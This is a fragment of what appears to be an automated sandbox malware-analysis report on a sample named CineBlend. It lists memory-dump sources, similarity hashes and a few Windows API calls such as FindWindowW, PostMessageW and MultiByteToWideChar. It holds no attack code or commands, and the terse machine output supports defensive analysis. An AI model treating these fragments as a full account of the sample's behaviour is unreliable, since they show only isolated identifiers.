                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 0adada234513cd243d2368dd364f1bf40e850da707bf10b17f8e539915306d3a
                                          • Instruction ID: 0ac1bb1e16b940ca94e291623bdbeb083cf6a4ef3916918b1d1ba8f3d1c30fa1
                                          • Opcode Fuzzy Hash: 0adada234513cd243d2368dd364f1bf40e850da707bf10b17f8e539915306d3a
                                          • Instruction Fuzzy Hash: 89D0223538A300B7E228B370AC1FFE6BB54EF10B00F1008767389AB0C0DCE0A800C680
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD2E08
                                          • PostMessageW.USER32(00000000), ref: 00BD2E0F
                                            • Part of subcall function 00BAF292: Sleep.KERNEL32 ref: 00BAF30A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 579ab168f87c2d779da9cca382ce25eec403ae9ab30223848ee4b0418d2a0dcc
                                          • Instruction ID: 6b8e300c49b95dc27a06a15452ce207a05b0c9b6719eff7855146d384eb0178d
                                          • Opcode Fuzzy Hash: 579ab168f87c2d779da9cca382ce25eec403ae9ab30223848ee4b0418d2a0dcc
                                          • Instruction Fuzzy Hash: 99D0A93138A3006AE228A370AC0BFD6AB54AB10B00F1008667285AB0C0D8A0A800C684
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B7C213
                                          • GetLastError.KERNEL32 ref: 00B7C221
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B7C27C
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast
                                          • String ID:
                                          • API String ID: 1717984340-0
                                          • Opcode ID: 035aa01ea14ade65b73ccdbe2d1ff733cb02ff53ed95d403c8816b45ae3603b0
                                          • Instruction ID: dd6c54a99674906699c487290abd1be2c8296219c20f9c4623d8e7f5a82106c2
                                          • Opcode Fuzzy Hash: 035aa01ea14ade65b73ccdbe2d1ff733cb02ff53ed95d403c8816b45ae3603b0
                                          • Instruction Fuzzy Hash: CF41D531600606AFDB218FE5C844ABA7FE5EF15710F24C1EDE86DA71A2EB308D01DB60